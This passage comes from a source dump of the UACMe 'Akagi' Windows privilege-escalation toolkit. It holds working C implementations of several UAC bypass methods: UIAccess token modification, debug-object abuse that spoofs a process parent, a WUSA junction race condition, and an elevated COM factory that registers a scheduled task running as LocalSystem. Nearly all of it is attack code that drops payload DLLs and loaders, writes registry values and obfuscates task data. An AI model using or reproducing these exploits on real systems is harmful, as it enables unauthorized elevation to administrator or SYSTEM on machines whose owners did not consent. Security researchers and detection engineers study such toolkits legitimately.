NORMAL_PRIORITY_CLASS,\n            NULL,\n            NULL,\n            &si,\n            &pi))\n        {\n            if (WaitForSingleObject(pi.hProcess, 10000) == WAIT_TIMEOUT)\n                TerminateProcess(pi.hProcess, (UINT)-1);\n\n            CloseHandle(pi.hThread);\n            CloseHandle(pi.hProcess);\n\n            Status = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    if (hProcessToken) NtClose(hProcessToken);\n\n    if (shinfo.hProcess) {\n        NtTerminateProcess(shinfo.hProcess, 
STATUS_SUCCESS);\n        NtClose(shinfo.hProcess);\n    }\n    if (hDupToken) NtClose(hDupToken);\n    if (pIntegritySid) RtlFreeSid(pIntegritySid);\n\n    _strcpy(szBuffer, g_ctx->szTempDirectory);\n    _strcat(szBuffer, PayloadFileName);\n    DeleteFile(szBuffer);\n\n    return Status;\n}\n\n/*\n* ucmTokenModUIAccessMethod\n*\n* Purpose:\n*\n* Obtain token from UIAccess application, modify it and reuse for UAC bypass.\n*\n*/\nNTSTATUS ucmTokenModUIAccessMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    return ucmxTokenModUIAccessExec(ProxyDll, ProxyDllSize,\n        FUBUKI_ENTRYPOINT_UIACCESS2, PKGMGR_EXE,\n        UacMethodTokenModUiAccess);\n}\n\n/*\n* ucmTokenModUIAccessMethod2\n*\n* Purpose:\n*\n* Variant inspired by Stefan Kanthak findings. Based on same tyranid UIAccess bypass.\n*\n*/\nNTSTATUS ucmTokenModUIAccessMethod2(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    HKEY hKey;\n    LRESULT lResult;\n    NTSTATUS Status = STATUS_ACCESS_DENIED;\n    SIZE_T sz;\n    WCHAR szPayload[MAX_PATH * 2];\n\n    _strcpy(szPayload, g_ctx->szTempDirectory);\n    _strcat(szPayload, THEOLDNEWTHING);\n    _strcat(szPayload, TEXT(\".dll\"));\n\n    if (supWriteBufferToFile(szPayload, ProxyDll, ProxyDllSize)) {\n\n        hKey = NULL;\n        lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR, 0, NULL,\n            REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);\n        if (lResult == ERROR_SUCCESS) {\n\n            sz = (1 + _strlen(szPayload)) * sizeof(WCHAR);\n            lResult = RegSetValueEx(hKey,\n                T_LOCATION,\n                0,\n                REG_SZ,\n                (BYTE*)szPayload,\n                (DWORD)sz);\n\n            if (lResult == ERROR_SUCCESS) {\n\n                Status = ucmxTokenModUIAccessExec(ProxyDll,\n                    ProxyDllSize,\n                    FUBUKI_ENTRYPOINT_UIACCESS3,\n                    PKGMGR_EXE,\n                    
UacMethodTokenModUiAccess2);\n\n            }\n\n            RegCloseKey(hKey);\n        }\n\n        RegDeleteKey(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR);\n        DeleteFile(szPayload);\n    }\n    return Status;\n}\n\n/*\n* ucmxCreateProcessFromParent\n*\n* Purpose:\n*\n* Create new process using parent process handle.\n*\n*/\nNTSTATUS ucmxCreateProcessFromParent(\n    _In_ HANDLE ParentProcess,\n    _In_ LPWSTR Payload)\n{\n    NTSTATUS status = STATUS_UNSUCCESSFUL;\n    SIZE_T size = 0x30;\n\n    STARTUPINFOEX si;\n    PROCESS_INFORMATION pi;\n\n    RtlSecureZeroMemory(&pi, sizeof(pi));\n    RtlSecureZeroMemory(&si, sizeof(si));\n    si.StartupInfo.cb = sizeof(STARTUPINFOEX);\n\n    do {\n        if (size > 1024)\n            break;\n\n        si.lpAttributeList = supHeapAlloc(size);\n        if (si.lpAttributeList) {\n\n            if (InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {\n                if (UpdateProcThreadAttribute(si.lpAttributeList, 0,\n                    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &ParentProcess, sizeof(HANDLE), 0, 0)) //-V616\n                {\n                    si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;\n                    si.StartupInfo.wShowWindow = SW_SHOW;\n\n                    if (CreateProcess(NULL,\n                        Payload,\n                        NULL,\n                        NULL,\n                        FALSE,\n                        CREATE_UNICODE_ENVIRONMENT | EXTENDED_STARTUPINFO_PRESENT,\n                        NULL,\n                        g_ctx->szSystemRoot,\n                        (LPSTARTUPINFO)&si,\n                        &pi))\n                    {\n                        CloseHandle(pi.hThread);\n                        CloseHandle(pi.hProcess);\n                        status = STATUS_SUCCESS;\n                    }\n                }\n            }\n\n            if (si.lpAttributeList)\n                DeleteProcThreadAttributeList(si.lpAttributeList); 
//dumb empty routine\n\n            supHeapFree(si.lpAttributeList);\n        }\n    } while (GetLastError() == ERROR_INSUFFICIENT_BUFFER);\n\n    return status;\n}\n\n/*\n* ucmDebugObjectMethod\n*\n* Purpose:\n*\n* Bypass UAC by direct RPC call to APPINFO and DebugObject use.\n*\n*/\nNTSTATUS ucmDebugObjectMethod(\n    _In_ LPWSTR lpszPayload\n)\n{\n    //UINT retryCount = 0;\n    BOOL debugObjectSet = FALSE;\n    NTSTATUS status = STATUS_ACCESS_DENIED;\n    HANDLE dbgHandle = NULL, dbgProcessHandle = NULL, dupHandle = NULL;\n    PROCESS_INFORMATION procInfo;\n    DEBUG_EVENT dbgEvent;\n    WCHAR szProcess[MAX_PATH * 2];\n\n    do {\n\n        //\n        // Spawn initial non elevated victim process under debug.\n        //\n        //do { /* remove comment for attempt to spam debug object within thread pool */\n\n        _strcpy(szProcess, g_ctx->szSystemDirectory);\n        _strcat(szProcess, WINVER_EXE);\n\n        if (!AicLaunchAdminProcess(szProcess,\n            szProcess,\n            0,\n            CREATE_UNICODE_ENVIRONMENT | DEBUG_PROCESS,\n            g_ctx->szSystemRoot,\n            T_DEFAULT_DESKTOP,\n            NULL,\n            INFINITE,\n            SW_HIDE,\n            &procInfo))\n        {\n            status = STATUS_UNSUCCESSFUL;\n            break;\n        }\n\n        //\n        // Capture debug object handle.\n        //\n        status = supGetProcessDebugObject(procInfo.hProcess,\n            &dbgHandle);\n\n        if (!NT_SUCCESS(status)) {\n            TerminateProcess(procInfo.hProcess, 0);\n            CloseHandle(procInfo.hThread);\n            CloseHandle(procInfo.hProcess);\n            procInfo.hThread = NULL;\n            procInfo.hProcess = NULL;\n            break;\n        }\n\n        //\n        // Detach debug and kill non elevated victim process.\n        //\n        NtRemoveProcessDebug(procInfo.hProcess, dbgHandle);\n        TerminateProcess(procInfo.hProcess, 0);\n        CloseHandle(procInfo.hThread);\n        
CloseHandle(procInfo.hProcess);\n\n        //} while (++retryCount < 20);\n\n        //\n        // Spawn elevated victim under debug.\n        //\n        _strcpy(szProcess, g_ctx->szSystemDirectory);\n        _strcat(szProcess, COMPUTERDEFAULTS_EXE);\n        RtlSecureZeroMemory(&procInfo, sizeof(procInfo));\n        RtlSecureZeroMemory(&dbgEvent, sizeof(dbgEvent));\n\n        if (!AicLaunchAdminProcess(szProcess,\n            szProcess,\n            1,\n            CREATE_UNICODE_ENVIRONMENT | DEBUG_PROCESS,\n            g_ctx->szSystemRoot,\n            T_DEFAULT_DESKTOP,\n            NULL,\n            INFINITE,\n            SW_HIDE,\n            &procInfo))\n        {\n            status = STATUS_UNSUCCESSFUL;\n            break;\n        }\n\n        //\n        // Update thread TEB with debug object handle to receive debug events.\n        //\n        DbgUiSetThreadDebugObject(dbgHandle);\n        debugObjectSet = TRUE;\n\n        //\n        // Debugger wait cycle.\n        //\n        while (1) {\n            if (!WaitForDebugEvent(&dbgEvent, INFINITE))\n                break;\n\n            switch (dbgEvent.dwDebugEventCode) {\n                //\n                // Capture initial debug event process handle.\n                //\n            case CREATE_PROCESS_DEBUG_EVENT:\n                dbgProcessHandle = dbgEvent.u.CreateProcessInfo.hProcess;\n                break;\n            }\n\n            if (dbgProcessHandle)\n                break;\n\n            ContinueDebugEvent(dbgEvent.dwProcessId, dbgEvent.dwThreadId, DBG_CONTINUE);\n        }\n\n        if (dbgProcessHandle) {\n            //\n            // Create new handle from captured with PROCESS_ALL_ACCESS.\n            //\n            status = NtDuplicateObject(dbgProcessHandle,\n                NtCurrentProcess(),\n                NtCurrentProcess(),\n                &dupHandle,\n                PROCESS_ALL_ACCESS,\n                0,\n                0);\n\n            if 
(NT_SUCCESS(status)) {\n                //\n                // Run new process with parent set to duplicated process handle.\n                //\n                ucmxCreateProcessFromParent(dupHandle, lpszPayload);\n                NtClose(dupHandle);\n                dupHandle = NULL;\n            }\n        }\n\n    } while (FALSE);\n\n    //\n    // Cleanup section.\n    //\n    if (debugObjectSet) {\n#pragma warning(push)\n#pragma warning(disable: 6387)\n        DbgUiSetThreadDebugObject(NULL);\n#pragma warning(pop)\n    }\n\n    if (dbgHandle) {\n        NtClose(dbgHandle);\n    }\n\n    if (dbgProcessHandle) {\n        CloseHandle(dbgProcessHandle);\n    }\n\n    // Release victim process if still open\n    if (procInfo.hThread) {\n        CloseHandle(procInfo.hThread);\n    }\n\n    if (procInfo.hProcess) {\n        TerminateProcess(procInfo.hProcess, 0);\n        CloseHandle(procInfo.hProcess);\n    }\n\n    supSetGlobalCompletionEvent();\n    return status;\n}\n"
  },
  {
    "path": "Source/Akagi/methods/wusa.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n*  TITLE:       WUSA.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  Windows Update Standalone Installer (WUSA) based routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"makecab.h\"\n\n/*\n* ucmCreateCabinetForSingleFile\n*\n* Purpose:\n*\n* Build cabinet for usage in methods where required 1 file.\n*\n*/\nBOOL ucmCreateCabinetForSingleFile(\n    _In_ LPWSTR lpSourceDll,\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize,\n    _In_opt_ LPWSTR lpInternalName\n)\n{\n    BOOL     bResult = FALSE;\n    CABDATA *Cabinet = NULL;\n    LPWSTR   lpFileName;\n    WCHAR    szMsuFileName[MAX_PATH * 2];\n\n    if ((ProxyDll == NULL) ||\n        (ProxyDllSize == 0) ||\n        (lpSourceDll == NULL)) return bResult;\n\n    do {\n\n        //drop proxy dll\n        if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {\n            break;\n        }\n\n        //build cabinet\n        RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));\n        _strcpy(szMsuFileName, g_ctx->szTempDirectory);\n        _strcat(szMsuFileName, ELLOCNAK_MSU);\n\n        Cabinet = cabCreate(szMsuFileName);\n        if (Cabinet == NULL)\n            break;\n\n        if (lpInternalName == NULL) {\n            lpFileName = _filename(lpSourceDll);\n        }\n        else {\n            lpFileName = lpInternalName;\n        }\n\n        //put file without compression\n        bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);\n        cabClose(Cabinet);       \n\n    } while (FALSE);\n\n    
DeleteFile(lpSourceDll);\n\n    return bResult;\n}\n\n/*\n* ucmWusaCabinetCleanup\n*\n* Purpose:\n*\n* Remove fake msu file.\n*\n*/\nVOID ucmWusaCabinetCleanup(\n    VOID)\n{\n    WCHAR    szMsuFileName[MAX_PATH * 2];\n\n    RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));\n    _strcpy(szMsuFileName, g_ctx->szTempDirectory);\n    _strcat(szMsuFileName, ELLOCNAK_MSU);\n    DeleteFile(szMsuFileName);\n}\n\nvolatile ULONG g_ThreadFinished = 0;\n\n/*\n* ucmxInvokeWusaThread\n*\n* Purpose:\n*\n* Start wusa and wait a bit.\n*\n*/\nDWORD ucmxInvokeWusaThread(\n    PVOID Param)\n{\n    SHELLEXECUTEINFO shinfo;\n    WCHAR szProcess[MAX_PATH * 2];\n    WCHAR szParameters[MAX_PATH * 3];\n\n    UNREFERENCED_PARAMETER(Param);\n\n    InterlockedExchange((LONG*)&g_ThreadFinished, 0);\n\n    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n\n    _strcpy(szProcess, g_ctx->szSystemDirectory);\n    _strcat(szProcess, WUSA_EXE);\n\n    RtlSecureZeroMemory(szParameters, sizeof(szParameters));\n    _strcpy(szParameters, TEXT(\" /quiet \"));\n    _strcat(szParameters, g_ctx->szTempDirectory);\n    _strcat(szParameters, ELLOCNAK_MSU);\n\n    shinfo.cbSize = sizeof(shinfo);\n    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI;\n    shinfo.lpFile = szProcess;\n    shinfo.lpParameters = szParameters;\n    shinfo.nShow = SW_HIDE;\n\n    if (ShellExecuteEx(&shinfo)) {\n\n        if (WaitForSingleObject(shinfo.hProcess, 1000) == WAIT_TIMEOUT)\n            TerminateProcess(shinfo.hProcess, 0);\n\n        CloseHandle(shinfo.hProcess);\n    }\n    Sleep(2000);\n    InterlockedExchange((LONG*)&g_ThreadFinished, 1);\n    return 0;\n}\n\n/*\n* ucmxDirectoryWatchdogThread\n*\n* Purpose:\n*\n* Monitor directory creation in system root directory.\n* When it happened - set reparse point.\n*\n*/\nDWORD ucmxDirectoryWatchdogThread(\n    PVOID Param)\n{\n    BOOL                        bResult = FALSE;\n    NTSTATUS                    status;\n\n    HANDLE                      
hDirectory = NULL, hReparseDirectory = NULL, hEvent = NULL;\n    IO_STATUS_BLOCK             IoStatusBlock;\n    OBJECT_ATTRIBUTES           ObjectAttributes;\n\n    LPWSTR                      lpTargetDirectory = (LPWSTR)Param;\n\n    PVOID                       Buffer = NULL;\n    SIZE_T                      memIO = 0;\n    FILE_NOTIFY_INFORMATION    *pInfo = NULL;\n\n    LPWSTR                      CapturedDirectoryName = NULL, lpEnd = NULL;\n\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    UNICODE_STRING usTargetDirectory, usWatchDirectory, usReparseDirectory;\n\n\n    do {\n\n        //\n        // Convert target directory path to native form.\n        //\n        usTargetDirectory.Buffer = NULL;\n        if (!RtlDosPathNameToNtPathName_U(lpTargetDirectory, &usTargetDirectory, NULL, NULL))\n            break;\n\n        //\n        // Convert watch directory path to native form.\n        //\n        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n        szBuffer[0] = L'\\\\';\n        szBuffer[1] = L'?';\n        szBuffer[2] = L'?';\n        szBuffer[3] = L'\\\\';\n        _strncpy(&szBuffer[4], MAX_PATH, g_ctx->szSystemDirectory, 3);\n\n        //\n        // Open directory for change notification.\n        //\n        RtlInitUnicodeString(&usWatchDirectory, szBuffer);\n        InitializeObjectAttributes(&ObjectAttributes, &usWatchDirectory, OBJ_CASE_INSENSITIVE, 0, NULL);\n\n        status = NtCreateFile(&hDirectory,\n            FILE_LIST_DIRECTORY | SYNCHRONIZE,\n            &ObjectAttributes,\n            &IoStatusBlock,\n            NULL,\n            FILE_OPEN_FOR_BACKUP_INTENT,\n            FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n            FILE_OPEN,\n            FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,\n            NULL,\n            0);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        memIO = 1024 * 1024;\n        Buffer = supHeapAlloc(memIO);\n        if (Buffer == NULL)\n            break;\n\n        
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, 0, NULL);\n        status = NtCreateEvent(&hEvent, EVENT_ALL_ACCESS, &ObjectAttributes, NotificationEvent, FALSE);\n        if (!NT_SUCCESS(status))\n            break;\n\n        //\n        // Watch for directory changes.\n        //\n        do {\n\n            status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL,\n                &IoStatusBlock, Buffer, (ULONG)memIO, FILE_NOTIFY_CHANGE_DIR_NAME, TRUE);\n\n            if (status == STATUS_PENDING)\n                NtWaitForSingleObject(hEvent, TRUE, NULL);\n\n            NtSetEvent(hEvent, NULL);\n\n            pInfo = (FILE_NOTIFY_INFORMATION*)Buffer;\n            for (;;) {\n\n                if (pInfo->Action == FILE_ACTION_ADDED) {\n\n                    memIO = pInfo->FileNameLength +\n                        ((1 + _strlen(szBuffer)) * sizeof(WCHAR));\n\n                    CapturedDirectoryName = (LPWSTR)supHeapAlloc(memIO);\n\n                    if (CapturedDirectoryName) {\n                        _strcpy(CapturedDirectoryName, szBuffer);\n                        lpEnd = _strend(CapturedDirectoryName);\n                        RtlCopyMemory(lpEnd, pInfo->FileName, pInfo->FileNameLength);\n\n                        //\n                        // Open new directory to set reparse point.\n                        //\n                        RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);\n                        InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);\n                        status = NtCreateFile(&hReparseDirectory, \n                            FILE_ALL_ACCESS,\n                            &ObjectAttributes,\n                            &IoStatusBlock,\n                            NULL,\n                            0,\n                            FILE_SHARE_READ | FILE_SHARE_WRITE,\n                            FILE_OPEN,\n                            
FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,\n                            NULL,\n                            0);\n\n                        if (NT_SUCCESS(status)) {\n\n                            //\n                            // Set reparse point.\n                            //\n                            bResult = supSetMountPoint(hReparseDirectory,\n                                usTargetDirectory.Buffer,\n                                lpTargetDirectory);\n\n                        }\n\n                        status = STATUS_NO_SECRETS;\n                    }\n\n                } //Action\n\n                if (status == STATUS_NO_SECRETS)\n                    break;\n\n                pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset);\n                if (pInfo->NextEntryOffset == 0)\n                    break;\n            }\n\n        } while (NT_SUCCESS(status));\n\n    } while (FALSE);\n\n    //\n    // Cleanup.\n    //\n    if (hEvent)\n        NtClose(hEvent);\n\n    if (hDirectory != NULL)\n        NtClose(hDirectory);\n\n    if (usTargetDirectory.Buffer)\n        RtlFreeUnicodeString(&usTargetDirectory);\n\n    if (Buffer != NULL)\n        supHeapFree(Buffer);\n\n    //\n    // Remove reparse point.\n    //\n    if (CapturedDirectoryName) {\n\n        while (g_ThreadFinished != 1)\n            Sleep(100);\n\n        if (hReparseDirectory) {\n            supDeleteMountPoint(hReparseDirectory);\n            NtClose(hReparseDirectory);\n        }\n\n        RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);\n        InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);\n        NtDeleteFile(&ObjectAttributes);\n        supHeapFree(CapturedDirectoryName);\n    }\n\n    return (DWORD)bResult;\n}\n\n/*\n* ucmWusaExtractViaJunction\n*\n* Purpose:\n*\n* Extract cab contents to the specified directory by initializing wusa race condition.\n* This routine 
expects the source to be the ellocnak.msu cab file in the %temp% folder.\n*\n*/\nBOOL ucmWusaExtractViaJunction(\n    _In_ LPWSTR lpTargetDirectory\n)\n{\n    HANDLE hWatchdogThread, hWusaThread;\n    DWORD ti;\n\n    do {\n\n        //\n        // Run watchdog thread.\n        //\n        hWatchdogThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxDirectoryWatchdogThread, lpTargetDirectory, 0, &ti);\n        if (hWatchdogThread == NULL)\n            break;\n\n        //\n        // Run wusa in separate thread.\n        //\n        hWusaThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxInvokeWusaThread, NULL, 0, &ti);\n        if (hWusaThread) {\n            if (WaitForSingleObject(hWusaThread, 15000) == WAIT_TIMEOUT)\n                TerminateThread(hWusaThread, 0);\n\n            CloseHandle(hWusaThread);\n        }\n\n        if (WaitForSingleObject(hWatchdogThread, 10000) == WAIT_TIMEOUT)\n            TerminateThread(hWatchdogThread, 0);\n\n        CloseHandle(hWatchdogThread);\n\n    } while (FALSE);\n\n    return (g_ThreadFinished == 1);\n}\n"
  },
  {
    "path": "Source/Akagi/methods/zcgonvh.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2020 - 2025\n*\n*  TITLE:       ZCGONVH.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        12 Dec 2025\n*\n*  UAC bypass methods based on zcgonvh original work.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"encresource.h\"\n\nHRESULT ucmxGetElevatedFactoryServerObject(\n    _In_ LPCWSTR Clsid,\n    _Out_ VOID** FactoryServer\n)\n{\n    HRESULT r;\n    IElevatedFactoryServer* pElevatedServer = NULL;\n\n    *FactoryServer = NULL;\n\n    r = ucmAllocateElevatedObject(Clsid,\n        &IID_ElevatedFactoryServer,\n        CLSCTX_LOCAL_SERVER,\n        (VOID**)&pElevatedServer);\n\n    if (FAILED(r))\n        return r;\n\n    if (pElevatedServer == NULL) {\n        return E_OUTOFMEMORY;\n    }\n\n    *FactoryServer = pElevatedServer;\n    return S_OK;\n}\n\nBOOL ucmxGetElevatedFactoryServerAndTaskService(\n    _Out_ IElevatedFactoryServer** FactoryServer,\n    _Out_ ITaskService** TaskService\n)\n{\n    IElevatedFactoryServer* pElevatedServer = NULL;\n    ITaskService* pService = NULL;\n    HRESULT r;\n\n    *TaskService = NULL;\n    *FactoryServer = NULL;\n\n    do {\n        r = ucmxGetElevatedFactoryServerObject(T_CLSID_VFServer,\n            (VOID**)&pElevatedServer);\n\n        if (r != S_OK)\n            break;\n\n        if (pElevatedServer == NULL) {\n            r = E_OUTOFMEMORY;\n            break;\n        }\n\n        r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer,\n            &CLSID_TaskScheduler,\n            &IID_ITaskService,\n            (void**)&pService);\n\n        if (r != S_OK) {\n            
break;\n        }\n\n        if (pService == NULL) {\n            r = E_OUTOFMEMORY;\n            break;\n        }\n\n        *FactoryServer = pElevatedServer;\n        *TaskService = pService;\n\n    } while (FALSE);\n\n    if (FAILED(r)) {\n        if (pElevatedServer) {\n            pElevatedServer->lpVtbl->Release(pElevatedServer);\n            pElevatedServer = NULL;\n        }\n    }\n\n    return SUCCEEDED(r);\n}\n\nBOOL ucmxRegisterAndRunTask(\n    _In_ ITaskService* TaskService,\n    _In_ BSTR RegistrationData\n)\n{\n    HRESULT r = E_FAIL;\n    VARIANT varDummy;\n\n    ITaskFolder* pTaskFolder = NULL;\n    IRegisteredTask* pTask = NULL;\n    IRunningTask* pRunningTask = NULL;\n\n    TASK_STATE taskState = TASK_STATE_UNKNOWN;\n\n    BSTR bstrTaskFolder = NULL, bstrTaskName = NULL;\n\n    do {\n\n        bstrTaskFolder = SysAllocString(L\"\\\\\");\n        if (bstrTaskFolder == NULL)\n            break;\n\n        bstrTaskName = SysAllocString(THEOLDNEWTHING);\n        if (bstrTaskName == NULL)\n            break;\n\n        VariantInit(&varDummy);\n\n        r = TaskService->lpVtbl->Connect(TaskService,\n            varDummy,\n            varDummy,\n            varDummy,\n            varDummy);\n\n        if (FAILED(r))\n            break;\n\n        r = TaskService->lpVtbl->GetFolder(TaskService, bstrTaskFolder, &pTaskFolder);\n        if (r != S_OK || pTaskFolder == NULL)\n            break;\n\n        r = pTaskFolder->lpVtbl->RegisterTask(pTaskFolder, bstrTaskName, RegistrationData, 0,\n            varDummy, varDummy, TASK_LOGON_INTERACTIVE_TOKEN, varDummy, &pTask);\n\n        if (r == HRESULT_FROM_WIN32(ERROR_ALREADY_EXISTS)) {\n\n            r = pTaskFolder->lpVtbl->GetTask(pTaskFolder, bstrTaskName, &pTask);\n            if (SUCCEEDED(r)) {\n\n                pTask->lpVtbl->Stop(pTask, 0);\n                pTask->lpVtbl->Release(pTask);\n\n                pTaskFolder->lpVtbl->DeleteTask(pTaskFolder, bstrTaskName, 0);\n            }\n\n            r 
= pTaskFolder->lpVtbl->RegisterTask(pTaskFolder, bstrTaskName, RegistrationData, 0,\n                varDummy, varDummy, TASK_LOGON_INTERACTIVE_TOKEN, varDummy, &pTask);\n        }\n\n        if (r != S_OK || pTask == NULL)\n            break;\n\n        r = pTask->lpVtbl->Run(pTask, varDummy, &pRunningTask);\n\n        if (r != S_OK || pRunningTask == NULL)\n            break;\n\n        if (SUCCEEDED(pRunningTask->lpVtbl->get_State(pRunningTask, &taskState))) {\n\n            if (taskState == TASK_STATE_RUNNING) {\n                Sleep(5000);\n            }\n\n        }\n        pRunningTask->lpVtbl->Stop(pRunningTask);\n        pTaskFolder->lpVtbl->DeleteTask(pTaskFolder, bstrTaskName, 0);\n\n    } while (FALSE);\n\n    if (bstrTaskFolder)\n        SysFreeString(bstrTaskFolder);\n\n    if (bstrTaskName)\n        SysFreeString(bstrTaskName);\n\n    if (pRunningTask)\n        pRunningTask->lpVtbl->Release(pRunningTask);\n\n    if (pTask)\n        pTask->lpVtbl->Release(pTask);\n\n    if (pTaskFolder)\n        pTaskFolder->lpVtbl->Release(pTaskFolder);\n\n    return SUCCEEDED(r);\n}\n\nBSTR ucmxBuildParametersForTask(\n    _In_ LPCWSTR lpLoader,\n    _In_ SIZE_T cbLoader\n)\n{\n    BSTR bstrResult = NULL;\n    SIZE_T sz;\n    PVOID workBuffer, offsetPtr;\n\n    sz = cbLoader +\n        sizeof(g_encodedTaskParamBegin) +\n        sizeof(g_encodedTaskParamEnd);\n\n    workBuffer = (PWCH)supHeapAlloc(sz);\n    if (workBuffer) {\n\n        offsetPtr = workBuffer;\n        RtlCopyMemory(offsetPtr, g_encodedTaskParamBegin, sizeof(g_encodedTaskParamBegin));\n        EncodeBuffer(offsetPtr, sizeof(g_encodedTaskParamBegin), AKAGI_XOR_KEY2);\n        offsetPtr = RtlOffsetToPointer(offsetPtr, sizeof(g_encodedTaskParamBegin));\n\n        RtlCopyMemory(offsetPtr, lpLoader, cbLoader);\n        offsetPtr = RtlOffsetToPointer(offsetPtr, cbLoader);\n\n        RtlCopyMemory(offsetPtr, g_encodedTaskParamEnd, sizeof(g_encodedTaskParamEnd));\n        EncodeBuffer(offsetPtr, 
sizeof(g_encodedTaskParamEnd), AKAGI_XOR_KEY2);\n\n        bstrResult = SysAllocString(workBuffer);\n\n        supHeapFree(workBuffer);\n    }\n\n    return bstrResult;\n}\n\n/*\n* ucmVFServerTaskSchedMethod\n*\n* Purpose:\n*\n* Bypass UAC by using Elevated Factory Server COM object.\n*\n* 1. Allocate Elevated Factory Server COM object and use it to create a Task Scheduler object.\n* 2. Use the Task Scheduler object to register a task running as LocalSystem.\n*\n*/\nNTSTATUS ucmVFServerTaskSchedMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    BOOL bNeedCleanup = FALSE;\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HRESULT hr_init;\n    IElevatedFactoryServer* pElevatedServer = NULL;\n    ITaskService* pTaskService = NULL;\n    BSTR bstrXml = NULL;\n    WCHAR szLoaderFileName[MAX_PATH * 2];\n\n    ucmConsolePrint(TEXT(\"[+] Entering ucmVFServerTaskSchedMethod\\r\\n\"));\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        //\n        // Write loader to the %temp%\n        //\n        if (!supReplaceDllEntryPoint(\n            ProxyDll,\n            ProxyDllSize,\n            AKATSUKI_ENTRYPOINT_EXE,\n            TRUE))\n        {\n            break;\n        }\n        RtlSecureZeroMemory(&szLoaderFileName, sizeof(szLoaderFileName));\n        _strcpy(szLoaderFileName, g_ctx->szTempDirectory);\n        _strcat(szLoaderFileName, THEOLDNEWTHING);\n        _strcat(szLoaderFileName, TEXT(\".exe\"));\n\n        bNeedCleanup = supWriteBufferToFile(szLoaderFileName, ProxyDll, ProxyDllSize);\n        if (!bNeedCleanup)\n            break;\n\n        bstrXml = ucmxBuildParametersForTask(szLoaderFileName, _strlen(szLoaderFileName) * sizeof(WCHAR));\n        if (bstrXml == NULL)\n            break;\n\n        if (!ucmxGetElevatedFactoryServerAndTaskService(&pElevatedServer, &pTaskService))\n            break;\n\n        if (ucmxRegisterAndRunTask(pTaskService, bstrXml))\n            MethodResult = 
STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    if (bstrXml)\n        SysFreeString(bstrXml);\n\n    if (pElevatedServer != NULL) {\n        pElevatedServer->lpVtbl->Release(pElevatedServer);\n    }\n\n    if (pTaskService) {\n        pTaskService->lpVtbl->Release(pTaskService);\n    }\n\n    if (SUCCEEDED(hr_init))\n        CoUninitialize();\n\n    if (bNeedCleanup)\n        DeleteFile(szLoaderFileName);\n\n    return MethodResult;\n}\n\ntypedef struct _UCMX_OVP {\n    PVOID ProxyDll;\n    DWORD ProxyDllSize;\n    WCHAR TargetFile[MAX_PATH * 2]; //%temp%\\hui32\\results.cab\n} UCMX_OVP, * PUCMX_OVP;\n\nHANDLE OverwriteThreadHandle = NULL;\nLONG TerminateOverwriteThread = FALSE;\n\n/*\n* ucmxOverwriteThread\n*\n* Purpose:\n*\n* Thread for race condition, continuously overwrite diagprofile results.cab file with the payload.\n*\n*/\nDWORD ucmxOverwriteThread(\n    _In_ PVOID Parameter)\n{\n    UCMX_OVP params;\n    HANDLE hTargetFile;\n    DWORD bytesIO;\n\n    RtlCopyMemory(&params, Parameter, sizeof(UCMX_OVP));\n\n    while 